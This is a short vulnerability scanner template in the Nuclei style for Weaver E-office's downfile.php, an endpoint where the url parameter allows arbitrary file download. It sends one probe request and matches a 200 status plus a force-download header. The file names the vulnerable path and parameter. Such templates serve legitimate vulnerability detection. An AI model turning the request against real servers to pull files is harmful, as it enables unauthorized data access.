http:
    - matchers:
        - status:
            - 200
          type: status
        - condition: and
          part: header
          type: word
          words:
            - application/force-download
      matchers-condition: and
      method: GET
      path:
        - '{{BaseURL}}/E-mobile/Data/downfile.php?url=/test'
id: EOffice-fileRead
info:
    author: Str1am
    name: 泛微E-office协同办公系统downfile.php文件url参数任意文件下载
    severity: high
    tags:
        - EOffice
        - fileRead
        - e-office
        - 泛微e-office
        - 协同办公系统
